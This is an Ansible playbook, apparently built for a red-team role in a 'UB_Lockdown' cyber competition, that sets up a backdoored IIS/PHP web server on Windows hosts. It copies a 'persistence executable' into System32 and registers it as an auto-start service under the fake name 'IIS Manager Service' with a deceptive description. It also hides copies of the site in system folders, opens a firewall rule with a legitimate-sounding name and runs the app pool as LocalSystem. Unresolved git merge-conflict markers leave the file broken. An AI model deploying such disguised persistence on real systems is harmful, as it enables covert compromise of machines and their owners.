- name: IIS Reverse Shell Server Configuration
  hosts: all
  gather_facts: true
  vars:
    Competition: "UB_Lockdown"

  tasks:
    - name: Installs IIS Web Service Features
      win_feature:
        name: 
          - Web-Server
          - Web-CGI
        state: present
        include_management_tools: yes
        
    - name: Download Visual C++ Redistributable
      win_get_url:
        url: "https://aka.ms/vs/17/release/vc_redist.x64.exe"
        dest: "C:\\vc_redist.x64.exe"

    - name: Install Visual C++ Redistributable
      win_shell: "C:\\vc_redist.x64.exe /quiet /install"
      args:
        executable: cmd
      register: vc_redist_install
      changed_when: vc_redist_install.rc == 0

    - name: Cleanup installation file
      win_file:
        path: "C:\\vc_redist.x64.exe"
        state: absent
        
    - name: Deploys Website Images
      win_copy:
        src: "~/IIS-Reverse-Shell/Images/{{ Competition }}/"
        dest: "C:\\inetpub\\wwwroot\\Images"
        
    - name: Deploys index.html
      win_copy:
<<<<<<< HEAD
        src: "~/IIS-Reverse-Shell/Website/{{ Competition }}.html"
        dest: "C:\\inetpub\\wwwroot"
        
    - name: Deploys web.config
      win_copy:
        src: "~/IIS-Reverse-Shell/Website/web.config"
        dest: "C:\\inetpub\\wwwroot"
        
    - name: Deploys button.js
      win_copy:
        src: "~/IIS-Reverse-Shell/Website/button.js"
        dest: "C:\\inetpub\\wwwroot"
=======
        src: "~/IIS-Reverse-Shell/Website/{{Competition}}/{{ Competition }}.html"
        dest: "C:\\inetpub\\{{ Competition }}"
        
    - name: Deploys web.config
      win_copy:
        src: "~/IIS-Reverse-Shell/Website/{{Competition}}/web.config"
        dest: "C:\\inetpub\\{{ Competition }}"
        
    - name: Deploys button.js
      win_copy:
        src: "~/IIS-Reverse-Shell/Website/{{Competition}}/button.js"
        dest: "C:\\inetpub\\{{ Competition }}"
>>>>>>> f630eceab4685153ce53579793f0422b80df086e
    
    - name: Deploys search.php
      win_copy:
        src: "~/IIS-Reverse-Shell/PHP/search.php"
        dest: "C:\\inetpub\\wwwroot\\search.php"

    - name: Deploys contact.php
      win_copy:
        src: "~/IIS-Reverse-Shell/PHP/contact.php"
        dest: "C:\\inetpub\\wwwroot\\contact.php"
        
    - name: Backup Website Contents
      win_shell: Copy-Item -Path "C:\inetpub\wwwroot" -Destination "C:\Windows\Help\Help" -Recurse -Force
      
    - name: Deploys Persistence Executable
      win_copy:
        src: "~/IIS-Reverse-Shell/Persistence/IISManagerService.exe"
        dest: "C:\\Windows\\System32"
     
    - name: Creates IIS_Folder_Name Variable Registry Key
      win_regedit:
<<<<<<< HEAD
      	path: HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip
      	name: IIS_Folder_Name
      	data: "{{ IIS_Folder_Name }}"
      	type: string

    - name: Creates IIS_Site_Name Variable Registry Key
      win_regedit:
      	path: HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip
      	name: IIS_Site_Name
      	data: "{{ IIS_Site_Name }}"
      	type: string

    - name: Creates IIS_AppPool Variable Registry Key
      win_regedit:
      	path: HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip
      	name: IIS_AppPool
      	data: "{{ IIS_AppPool }}"
      	type: string
      	
=======
        path: HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip
        name: Competition
        data: "{{ Competition }}"
        type: string
        
>>>>>>> f630eceab4685153ce53579793f0422b80df086e
    - name: Adds Executable to Services
      win_shell:  New-Service -Name "webmgrsvc" -Binary "C:\Windows\System32\IISManagerService.exe" -DisplayName "IIS Manager Service" -Description "This service is an integrated IIS component that optimizes and secures web server connections by dynamically regulating inbound traffic." -StartupType Automatic
      ignore_errors: yes
        
    - name: Starts Service
      win_service:
        name: "webmgrsvc"
        state: started
      ignore_errors: yes
      
    - name: Check if firewall rule is enabled or not, and enable it if necessary
      win_shell: |
        $existingRule = Get-NetFirewallRule | Where-Object { 
            $_.DisplayName -eq 'Core Networking - IPHTTP (TCP-In)' 
        };
        if ($existingRule) { 
            if ($existingRule.Enabled -eq 'False') {
                Set-NetFirewallRule -DisplayName 'Core Networking - IPHTTP (TCP-In)' -Enabled True
            }
        } else {
            New-NetFirewallRule -DisplayName 'Core Networking - IPHTTP (TCP-In)' -Direction Inbound -Protocol TCP -Action Allow -LocalPort 80 -Group 'Core Networking Optimization' -Description 'Inbound TCP rule to allow IPHTTP tunneling technology to provide connectivity across HTTP proxies and firewalls.'
        }
        
    - name: Downloads PHP
      win_get_url:
        url: "https://windows.php.net/downloads/releases/php-8.4.6-nts-Win32-vs17-x64.zip"
        dest: "C:\\Program Files\\php.zip"
        
    - name: Extracts PHP to Program Files
      win_unzip:
        src: "C:\\Program Files\\php.zip"
        dest: "C:\\Program Files\\PHP"
        remote_src: yes

    - name: Deletes the PHP ZIP File After Extraction
      win_shell: Remove-Item -Path "C:\\Program Files\php.zip" -Force
      
    - name: Remove default php.ini-development
      win_shell: Remove-Item -Path "C:\\Program Files\\PHP\\php.ini-development" -Force
    
    - name: Copy php.ini to PHP Directory
      win_copy:
        src: "~/IIS-Reverse-Shell/PHP/php.ini"
        dest: "C:\\Program Files\\PHP\\php.ini"
        
    - name: Copies PHP Files to a Backup Location
      win_shell: Copy-Item -Path "C:\Program Files\PHP" -Destination "C:\ProgramData\Microsoft\PHP" -Recurse -Force
      
    - name: Set Application Pool to LocalSystem
      win_iis_webapppool:
        name: DefaultAppPool
        state: started
        attributes:
          processModel.identityType: LocalSystem

    - name: Restarts IIS
      win_shell: iisreset /restart
